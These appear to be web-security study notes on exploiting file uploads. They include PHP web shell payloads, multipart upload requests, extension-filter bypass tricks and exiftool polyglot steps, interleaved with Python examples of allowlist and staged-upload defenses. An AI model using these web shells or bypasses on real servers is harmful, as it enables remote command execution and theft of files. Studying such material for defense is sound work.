Client Side
Type of vulnerabilities
# Uploading a simple PHP file
Content-Disposition: form-data; name="avatar"; filename="exploit.php"
Content-Type: image/jpeg
<?php echo file_get_contents('/home/carlos/secret'); ?>
-----------------------------------------------------------------------------
# Changing Content Type
Content-Disposition: form-data; name="avatar"; filename="exploit.php"
Content-Type: application/x-php
<?php echo system($_GET['cmd']); ?>
-----------------------------------------------------------------------------
# Changing the filename directory (path traversal)
Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"
Content-Type: image/jpeg
<?php echo system($_GET['cmd']); ?>
-----------------------------------------------------------------------------
# Changing the Content-Type header - other possibility, see the path traversal technique
Content-Type: multipart/form-data; boundary=--------012345...
--------012345...
Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"
Content-Type: image/jpeg
<?php echo system($_GET['cmd']); ?>
--------012345... --
-----------------------------------------------------------------------------
# Insufficient blacklisting of dangerous file types
- Permutations
.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
.cfm, .cfml, .cfc, .dbm
.swf
.pl, .cgi
.yaws
- Other techniques
- Change to uppercase letters. ex: .Php2
- Adding a valid extension before the executable extension. ex: file.png.php
- Obfuscating file extensions. ex: exploit.p.phphp
- Special characters. ex: file.php%20, file.php%0d%0a, file.php%00, file.php/
- Tricking the extension parser. ex: file.php\x00.png, file.php%0d%0a.png, ...
- Another layer of extensions. ex: file.png.jpg.php, file.php%00.png%00.jpg
- Executable extension before the valid extension. ex: file.php.png
- NTFS alternate data stream (ADS)
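Every trick in the list above defeats a blocklist because a blocklist has to enumerate bad names. The defensive counterpart is a strict allowlist on the shape of the name plus a lowercase lookup of the single extension. The following is an added example written for this page, not code from the original notes; the extension set and the name pattern are constructed assumptions for an image-upload endpoint.

```python
import re
from urllib.parse import unquote

# Extensions this upload endpoint accepts (constructed allowlist for the example).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# One base name of plain characters, exactly one dot, one short extension.
# Anything that does not fit this shape (double extensions, spaces, NUL bytes,
# path separators, ADS colons) is rejected before the extension is even looked at.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}$")


def is_safe_upload_name(filename: str) -> bool:
    """Allowlist check for a user-supplied filename.

    The tricks a blocklist misses (case changes, trailing %20/%00, a valid
    extension stacked before or after the executable one, ..%2f traversal)
    all fall out of a strict shape check plus a lowercase allowlist lookup.
    """
    # Judge the name on its decoded form so %2f, %00 and %20 are seen as '/', NUL and space.
    decoded = unquote(filename)
    # Control characters (including NUL and CR/LF) never belong in a filename.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return False
    # Reject anything that could be a path component, a parameter separator or an ADS.
    if any(ch in decoded for ch in "/\\:;"):
        return False
    if not SAFE_NAME.fullmatch(decoded):
        return False
    ext = decoded.rsplit(".", 1)[1].lower()
    return ext in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    for name in ("avatar.jpg", "Avatar-01.PNG", "exploit.pHp", "file.php%00.jpg",
                 "file.php.png", "exploit.p.phphp", "..%2fexploit.php", "exploit.php;.jpg"):
        print(f"{name!r:28} -> {'accept' if is_safe_upload_name(name) else 'reject'}")
```

Even when the name passes, the server should not use it: store the file under a server-generated random name and keep only the validated extension, so the user-controlled string never reaches the filesystem.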
-----------------------------------------------------------------------------
# Overriding the server configuration
Developers can set directory-specific configuration:
- IIS ---> web.config
- Apache ---> .htaccess (possible to overwrite if one is already there)
- other ---> search Google
-----------------------------------------------------------------------------
# Flawed validation of the file's contents (byte change)
- Add the PHP code inside an image's comment field with exiftool
- Change the output file of the JPEG -> -comment="php-code" file.jpeg -o shell.php
- The metadata still says it is a JPEG, but the file will act as PHP
- Look inside the JPEG file loaded on the page to check whether it contains the information
- JPEG files always begin with the bytes FF D8 FF --> server-side verification
- Include these bytes inside the PHP file (combine with other techniques if needed)
- Can verify this using exiftool
-----------------------------------------------------------------------------
# Exploiting file upload race conditions
Modern frameworks mitigate file upload risks by writing uploads to temporary, sandboxed directories, randomizing file names, and validating them before moving them into place.
When developers bypass the framework, race conditions can arise. For example, some sites write the file straight to its final location and rely on an anti-virus check afterwards; during the validation delay there is a brief window in which the file can be requested and executed.
These issues are hard to detect without access to the source code, so with the right timing it may be possible to exploit the vulnerability.
Weak randomness in the temporary name or directory (e.g. `uniqid()`) can let an attacker guess it, and larger files lengthen the window for such attacks.
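The two preceding sections describe the same defensive gap from two angles: a magic-byte check that accepts a JPEG carrying PHP in its EXIF comment, and a file that is reachable by URL before validation finishes. The pipeline below is an added example for this page, not code from the original notes or from any framework; the accepted image types, the script markers and the directory layout are constructed assumptions. It stages the upload outside the web root, requires the magic bytes to match the claimed extension and rejects any script marker in the body, then moves the file atomically under a 128-bit random name.

```python
import os
import re
import secrets
import tempfile
from typing import Optional

# Magic bytes for the image types this endpoint accepts (constructed allowlist).
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Script markers that must never appear anywhere in an image we are going to serve.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def sniff_type(data: bytes) -> Optional[str]:
    """Return the image type whose signature the data starts with, or None."""
    for kind, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return kind
    return None


def content_ok(data: bytes, claimed_ext: str) -> bool:
    """A magic-byte check alone passes a JPEG with PHP in its EXIF comment,
    so require the signature to match the claimed extension AND reject any
    script marker in the body (compared case-insensitively)."""
    if sniff_type(data) != claimed_ext:
        return False
    lowered = data.lower()
    return not any(marker in lowered for marker in SCRIPT_MARKERS)


def store_upload(data: bytes, claimed_ext: str, staging_dir: str, final_dir: str) -> Optional[str]:
    """Write to a staging directory outside the web root, validate there, then
    move atomically into final_dir under a random server-chosen name.

    The file is never reachable by URL until validation has finished, so there
    is no window in which a request can execute it, and the 128-bit random name
    cannot be guessed the way a uniqid()-style timestamp can. staging_dir and
    final_dir must be on the same filesystem for os.replace to be atomic.
    """
    fd, tmp_path = tempfile.mkstemp(dir=staging_dir)
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        if not content_ok(data, claimed_ext):
            return None                       # finally: staged file is deleted
        final_path = os.path.join(final_dir, f"{secrets.token_hex(16)}.{claimed_ext}")
        os.replace(tmp_path, final_path)      # atomic rename, no partially-visible file
        tmp_path = None                       # moved; nothing left to clean up
        return final_path
    finally:
        if tmp_path is not None:
            os.unlink(tmp_path)


def demo() -> dict:
    """Run the pipeline on constructed inputs: a clean JPEG header and a JPEG
    header followed by a PHP open tag (the EXIF-comment polyglot pattern)."""
    clean = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
    polyglot = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"<?php /* constructed marker */ ?>"
    staging, final = tempfile.mkdtemp(), tempfile.mkdtemp()
    stored = store_upload(clean, "jpg", staging, final)
    rejected = store_upload(polyglot, "jpg", staging, final)
    return {
        "clean_stored": stored is not None and os.path.isfile(stored),
        "clean_name_random": bool(re.fullmatch(r"[0-9a-f]{32}\.jpg", os.path.basename(stored or ""))),
        "polyglot_rejected": rejected is None,
        "staging_empty": os.listdir(staging) == [],
    }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check:20} {outcome}")
```

Marker scanning is a cheap backstop, not a parser; the stronger fix for image uploads is to re-encode the picture through an image library so that every metadata segment is discarded, and to serve the upload directory with script execution disabled so that even a file that slips through is returned as bytes rather than run.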
Other ways to exploit file upload
Remote Code
XSS ---> HTML files or SVG images (insert <script>)
XXE ---> .doc or .xls files (XXE injection attacks)
PUT upload ---> simply put the PHP code in the body, as in a POST message, and send it via PUT
OPTIONS upload ---> same, but sent via OPTIONS
Zip file ---> a path traversal name inside the zip allows overwriting files
Extra
# Try uploading an allowed file type (e.g. jpg), intercept the request and modify the name
exploit.php%00.jpg ---> Using a null byte can allow you to bypass this (the %00.jpg is dropped when the file is looked up)
exploit.php;.jpg ---> Using a different syntax
exploitxC0 x2Ephph ---> Using multibyte Unicode characters
exploit.pHp ---> Capital letters
exploit.p.phphp ---> The filter strips the forbidden extension but leaves behind a valid one
PHP payloads
# List the directory
<?php echo implode("<br>",array_diff(scandir('/home/User_X/'),array('.','..'))); ?>
# Read a specific file
<?php echo file_get_contents('/home/User_X/secret'); ?>
# Run Commands
<?php echo system($_GET['command']); ?>